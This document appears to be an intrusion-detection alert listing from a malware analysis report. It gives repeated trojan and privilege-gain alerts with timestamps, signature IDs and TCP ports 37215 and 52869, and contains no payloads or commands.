                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:39826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.104584
                      SID:2027339
                      Source Port:45122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:01.613026
                      SID:2027339
                      Source Port:54282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.067351
                      SID:2027339
                      Source Port:47736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.536547
                      SID:2025132
                      Source Port:57080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2027339
                      Source Port:59578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.408866
                      SID:2025132
                      Source Port:46510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.044272
                      SID:2027339
                      Source Port:42620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2829579
                      Source Port:53142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.465127
                      SID:2025132
                      Source Port:58504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.148721
                      SID:2027339
                      Source Port:38690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2027339
                      Source Port:52566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.221858
                      SID:2027339
                      Source Port:42290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:44744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.466712
                      SID:2829579
                      Source Port:53836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.546878
                      SID:2025132
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.183172
                      SID:2027339
                      Source Port:41402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.132842
                      SID:2025132
                      Source Port:36402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.767606
                      SID:2027339
                      Source Port:53696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.435475
                      SID:2831300
                      Source Port:49526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.545017
                      SID:2027339
                      Source Port:40230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:49.853581
                      SID:2027339
                      Source Port:40940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.208138
                      SID:2027339
                      Source Port:53082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.762937
                      SID:2027339
                      Source Port:40996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2835222
                      Source Port:52786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2831300
                      Source Port:46592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.692242
                      SID:2025132
                      Source Port:50158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2829579
                      Source Port:49638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:34194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2835222
                      Source Port:52320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2831300
                      Source Port:47004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.323670
                      SID:2835222
                      Source Port:57526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.181584
                      SID:2831300
                      Source Port:42458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.265687
                      SID:2025132
                      Source Port:42898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.496960
                      SID:2831300
                      Source Port:41850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.605729
                      SID:2025132
                      Source Port:60630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.622531
                      SID:2027339
                      Source Port:56504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.507639
                      SID:2831300
                      Source Port:41800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.204161
                      SID:2025132
                      Source Port:37344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:38630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2831300
                      Source Port:45740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.671322
                      SID:2027339
                      Source Port:55280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.202217
                      SID:2025132
                      Source Port:42874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.930873
                      SID:2831300
                      Source Port:49596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.342361
                      SID:2829579
                      Source Port:48014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2835222
                      Source Port:37036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.507047
                      SID:2025132
                      Source Port:54010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.564288
                      SID:2027339
                      Source Port:38838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:39974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.301436
                      SID:2025132
                      Source Port:36732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.718589
                      SID:2831300
                      Source Port:58612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.067283
                      SID:2027339
                      Source Port:40530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:57610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.350524
                      SID:2027339
                      Source Port:51432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.511508
                      SID:2831300
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.022949
                      SID:2027339
                      Source Port:48002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.027141
                      SID:2027339
                      Source Port:40532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:42676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.590112
                      SID:2829579
                      Source Port:36998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.334607
                      SID:2027339
                      Source Port:53642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2829579
                      Source Port:52032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2027339
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.227664
                      SID:2025132
                      Source Port:43300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.498293
                      SID:2025132
                      Source Port:51308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.406047
                      SID:2025132
                      Source Port:56070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.620754
                      SID:2835222
                      Source Port:52976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.588323
                      SID:2027339
                      Source Port:55340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.617233
                      SID:2027339
                      Source Port:48512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.035512
                      SID:2027339
                      Source Port:41158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2027339
                      Source Port:38060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2831300
                      Source Port:55748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.747455
                      SID:2835222
                      Source Port:39988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.283476
                      SID:2027339
                      Source Port:52560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2027339
                      Source Port:38404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2829579
                      Source Port:36540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.081357
                      SID:2831300
                      Source Port:59646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.929504
                      SID:2025132
                      Source Port:60666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.333647
                      SID:2025132
                      Source Port:41918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:43368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.500663
                      SID:2025132
                      Source Port:57804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.660344
                      SID:2829579
                      Source Port:56444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.049580
                      SID:2027339
                      Source Port:49526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2831300
                      Source Port:43414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:45392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.152960
                      SID:2027339
                      Source Port:57160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.297548
                      SID:2027339
                      Source Port:53600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2027339
                      Source Port:52168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.310437
                      SID:2025132
                      Source Port:47348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.535629
                      SID:2027339
                      Source Port:43382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2831300
                      Source Port:49388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.292228
                      SID:2027339
                      Source Port:43674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2835222
                      Source Port:35800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2831300
                      Source Port:38922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.422962
                      SID:2835222
                      Source Port:35444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.851101
                      SID:2025132
                      Source Port:52582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2829579
                      Source Port:37954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.686584
                      SID:2831300
                      Source Port:43468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.796964
                      SID:2027339
                      Source Port:41830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164358
                      SID:2027339
                      Source Port:53238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.293209
                      SID:2831300
                      Source Port:53506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.180597
                      SID:2027339
                      Source Port:36018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.285913
                      SID:2025132
                      Source Port:58854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:49790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.440618
                      SID:2831300
                      Source Port:46778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.982999
                      SID:2025132
                      Source Port:47178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.342053
                      SID:2027339
                      Source Port:56988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:34356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.041924
                      SID:2027339
                      Source Port:60066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.934535
                      SID:2027339
                      Source Port:60162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.708489
                      SID:2027339
                      Source Port:51434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:46882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.612988
                      SID:2027339
                      Source Port:47986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.472881
                      SID:2831300
                      Source Port:50684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:28.049580
                      SID:2025132
                      Source Port:55886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.551205
                      SID:2027339
                      Source Port:34848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:48720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.040620
                      SID:2027339
                      Source Port:34364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.581239
                      SID:2831300
                      Source Port:48100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.433951
                      SID:2027339
                      Source Port:50382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.606361
                      SID:2025132
                      Source Port:56266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.109608
                      SID:2027339
                      Source Port:60960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.815974
                      SID:2025132
                      Source Port:56836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2829579
                      Source Port:48098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.750662
                      SID:2025132
                      Source Port:51874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2835222
                      Source Port:60788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2027339
                      Source Port:56146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.364114
                      SID:2027339
                      Source Port:55246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:58842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.499623
                      SID:2027339
                      Source Port:46682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.284824
                      SID:2025132
                      Source Port:55740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.171719
                      SID:2027339
                      Source Port:34548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2027339
                      Source Port:54220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:41688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.127021
                      SID:2831300
                      Source Port:38770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.394422
                      SID:2027339
                      Source Port:39618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.985417
                      SID:2025132
                      Source Port:45042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.446227
                      SID:2829579
                      Source Port:36230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.588800
                      SID:2027339
                      Source Port:47318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.337765
                      SID:2025132
                      Source Port:59052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.581336
                      SID:2027339
                      Source Port:52466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2831300
                      Source Port:42892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.281162
                      SID:2027339
                      Source Port:41060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2829579
                      Source Port:44092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:48738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2835222
                      Source Port:49742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.136226
                      SID:2831300
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.830942
                      SID:2027339
                      Source Port:56886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.675613
                      SID:2025132
                      Source Port:43334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.402930
                      SID:2829579
                      Source Port:50444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.183242
                      SID:2027339
                      Source Port:46078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.489677
                      SID:2025132
                      Source Port:57582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.475273
                      SID:2027339
                      Source Port:47700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:39464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2025132
                      Source Port:49722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.130220
                      SID:2027339
                      Source Port:54534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.549584
                      SID:2025132
                      Source Port:60564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.773442
                      SID:2835222
                      Source Port:35610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:60568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.453008
                      SID:2027339
                      Source Port:45346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.744447
                      SID:2025132
                      Source Port:35402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2027339
                      Source Port:46492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2835222
                      Source Port:59626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:32800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.546680
                      SID:2027339
                      Source Port:34094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.062886
                      SID:2027339
                      Source Port:55654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.888773
                      SID:2027339
                      Source Port:42110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2835222
                      Source Port:35030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2835222
                      Source Port:56444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.647376
                      SID:2027339
                      Source Port:40472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.425707
                      SID:2027339
                      Source Port:44530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.513489
                      SID:2027339
                      Source Port:41034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2027339
                      Source Port:58444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2835222
                      Source Port:36890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:52902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:46224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:49252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:53774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.381513
                      SID:2027339
                      Source Port:60842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.904970
                      SID:2027339
                      Source Port:41030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993302
                      SID:2027339
                      Source Port:41350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.305924
                      SID:2027339
